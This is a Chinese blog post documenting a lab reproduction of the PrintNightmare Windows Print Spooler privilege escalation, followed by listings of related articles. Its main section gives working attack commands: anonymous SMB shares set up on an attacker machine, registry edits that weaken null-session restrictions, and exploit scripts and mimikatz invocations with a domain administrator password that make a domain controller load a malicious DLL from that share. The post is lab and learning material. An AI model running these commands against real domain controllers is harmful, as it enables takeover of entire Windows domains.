CVE-2021-34527: PrintNightmare 域内提权

最新推荐文章于 2025-03-11 03:11:10 发布
最新推荐文章于 2025-03-11 03:11:10 发布
阅读量767 收藏 12
点赞数 17
文章标签: 网络 服务器 运维 哈希算法 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anddddoooo/article/details/145780801
版权

  • 域控 ip:192.168.72.21,hostname:dc01

  • 域内攻击者机器 ip:192.168.72.158,hostname:WIN10-01

  • 攻击者 kali 机器 ip:192.168.72.162

如果目标机器开启 Print Spooler 服务,那么此漏洞允许攻击者将代码注入到 Print Spooler 服务的进程 spoolsv.exe 中,以 system 权限执行。

漏洞实验

检测是否开放MS-RPRN服务
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
linux创建smb服务

目的是为了让目标访问到Evil.dll

修改SMB配置文件/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
user share allow guests = yes
idmap config* : backend=tdb
smb ports=445
​
[smb]
comment=Samba 
path=/tmp/
guest ok=yes
read only=no
browsable=yes

启动smb服务

#启动smb服务
service smbd start
service smbd status
windows创建smb服务
mkdir C:\share\
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
CVE-2021-1675.py 脚本攻击
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll
​
python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21

这里可以看到我的环境下虽然能上传 dll,但是加载不了。

 

mimikatz攻击
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll"
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"
Lil_Dean
关注
Windows Print Spooler升漏洞(PrintNightmare
谢公子的博客
06-29 3968
目录 一:漏洞概述 二:影响范围 三:漏洞利用 四:漏洞防护 4.1 官方升级 4.2 临时防护措施 一:漏洞概述 6月9日,绿盟科技CERT监测到微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个WindowsPrintSpooler升漏洞(CVE-2021-1675),此漏洞为绿盟科技天机实验室向微软报告并获得官方致谢。 Print Spooler是Windows系统中用于管理打印相关事务的服务,虽然微软在公告中将该漏洞标记为Important级别的本地升漏洞..
Windows PrintNightmare 漏洞和补丁分析
smellycat000的专栏
07-07 2073
聚焦源代码安全,网罗国内外最新资讯!一、背景CVE-2021-34527是发生在windows打印服务中的漏洞,攻击者可以利用该漏洞使用低限用户加载恶意DLL,实现远程代码执行。该漏洞...
Windows Print Spooler服务最新漏洞CVE-2021-34527详解
m0_61331237的博客
03-21 859
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
【EXP已验证】CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行0day漏洞通告
爱国小白帽
07-02 1888
报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527(PrintNightmare)的研判 2.漏洞详情新增相关验证截图 2 漏洞简述 2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler 蠕虫级远程代码执行0day漏洞的EXP,漏洞等级:严重,漏洞评分:10.0。 Windows Print
Windows -PrintNightmare
最新发布
weixin_30551437的博客
03-11 87
本文通过 Google 翻译 PrintNightmare – Windows Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。 导航 0 前言 1 CVE-2021-34527PrintNightmare RCE(准 远程代码执行) 1.1 远程枚举 Print Spooler 服务 1.2 行刑前的准备...
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
热门推荐
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
如何通过组策略来缓解打印机后台处理程序漏洞CVE-2021-34527
wyxtx的博客
10-13 303
如何通过组策略来缓解打印机后台处理程序漏洞CVE-2021-34527
因为计算机中丢失6595,windows 10 安装CVE-2021-34527漏洞补丁后,开机任务栏丢失,补丁无法卸载...
weixin_39889792的博客
07-24 415
您好,请问您是在下载安装了KB5004945后发生的问题吗?目前在更新已知问题中并没有任务栏丢失的报告,建议您先移除更新看是否会发生同样的错误。https://support.microsoft.com/en-us/topic/july-6-2021-kb5004945-os-builds-19041-1083-19042-1083-and-19043-1083-out-of-band-44b34...
打破边界:PrintNightmare - 深入Windows打印服务的RCE/LPE漏洞
gitblog_00016的博客
06-26 694
打破边界:PrintNightmare - 深入Windows打印服务的RCE/LPE漏洞 去发现同类优质开源项目:https://gitcode.com/ 简介 PrintNightmare是一个影响所有版本Windows系统的远程代码执行(RCE)和本地升(LPE)漏洞(CVE-2021-34527, CVE-2021-1675)。攻击者能够利用这个漏洞,在运行打印服务的系统上获取SYS...
Windows 升:PrintNightmare
weixin_46634434的博客
02-23 720
介绍 自从 Stuxnet 蠕虫利用 print spooler 的特升级漏洞通过网络在伊朗的核浓缩离心机中传播并感染了 45000 多个网络以来,Print Spooler 就一直受到研究人员的关注。PrintNightmare 是 Microsoft Windows 操作系统中 Print Spooler 服务 (spoolsv.exe) 中远程代码执行漏洞的通用名称。该漏洞被分配了 CVE-2021-34527。最初,它被认为是本地升 (LPE) 并分配了 CVE-2021-1675。LPE
漏洞复现|PrintNightmareCVE-2021-1675)复现
weixin_42282189的博客
01-05 5985
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 环境准备 一个普通限的域账户 目标开启.
PrintNightmare开源项目实战指南
gitblog_00932的博客
09-03 937
PrintNightmare开源项目实战指南 PrintNightmarePython implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)项目地址:https://gitcode.com/gh_mirrors/pri/PrintNightmare 项目介绍 PrintNightmare,一个在安全界引起巨大轰动的开...
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 886
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
打破安全防线:体验CVE-2021-1675和CVE-2021-34527PrintNightmare 漏洞利用工具
gitblog_00034的博客
05-09 501
打破安全防线:体验CVE-2021-1675和CVE-2021-34527PrintNightmare 漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 深入技术安全领域的你,是否对最近的 PrintNightmare 漏洞有所耳闻?这个漏洞(CVE-2021-1675 和 CVE-2021-34527)影响了微软的打印服务,允许攻击者在目标系统上执行恶...
Windows Print Spooler服务最新漏洞CVE-2024-34527详解
m0_61043185的博客
04-12 493
据Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)在最初公开的exp README里描述,spooler的漏洞最初用于10年前的震网(Stuxnet)攻击,10年间spooler模块也被披露了许多漏洞,但不知是因为微软补丁修复的不彻底还是spooler模块本身实现起来的复杂性导致了CVE-2021-1675和CVE-2021-34527的出现。微软已于2021.7.7发布了一个紧急安全更新补丁,希望微软的这个补丁能使spooler更安全一些吧。
2024年最全超详细Impacket官方使用指南(1),2024年最新2024HarmonyOS鸿蒙常见面试题分享
2401_84862386的博客
05-14 1304
对于ntlmrelayx.py你还需要安装ldapdomaindump,flask并ldap3如果你在Windows下,你将需要安装 pyReadline最近发布的Impacket安装为了安装源,请从解压缩Impacket包的目录中执行以下命令:pip install . 这将把类安装到默认的Python模块路径中;请注意,您可能需要特殊的限才能在那里进行写入。有关setup.py中可用的命令和选项的详细信息,请运行python setup.py --help-commands。
网络安全之渗透实战学习
qq_44005305的博客
10-12 145
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所供的写入限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
Linux-Samba文件共享服务_grep -v "#" etc samba smb(1)
2301_78398209的博客
04-17 986
设置完成共享用户的别名以后,若要正常启用账号映射功能,需要修改主配置文件/etc/samba/smb.conf,添加全局配置项“ username map = /etc/samba/smbusers ”,然后重新加载配置即可生效。1.建立Samba用户数据库 :执行pdbedit -a -u vina命令可以添加一个名为vina的Samba共享用户,其中的-a选项表示添加,-u选项用于指定用户名称。当指定的Samba用户不在使用时,结合-x选项并指定samba用户名称,删除指定的samba账号。
CVE-2021-34527漏洞
05-12
CVE-2021-34527,也被称为PrintNightmare漏洞,是一个Windows Print Spooler服务中的安全漏洞,影响了Windows 7、Windows Server 2008、Windows Server 2012和Windows Server 2016等操作系统版本。攻击者可以利用这个漏洞获取系统管理员限,甚至可能完全控制受影响的系统。 该漏洞的攻击方式比较多样化,可能通过本地访问或远程利用进行攻击。攻击者可以利用Windows Print Spooler服务的缺陷来执行任意代码,导致受影响系统上的数据泄露、恶意软件安装、系统崩溃等问题。 Microsoft已经发布了一些补丁和建议的修复方法,建议用户及时更新系统并采取相关防范措施。同时,网络管理员也应该注意加强对网络设备的安全管理,限制外部访问,以及随时关注最新的安全漏洞信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值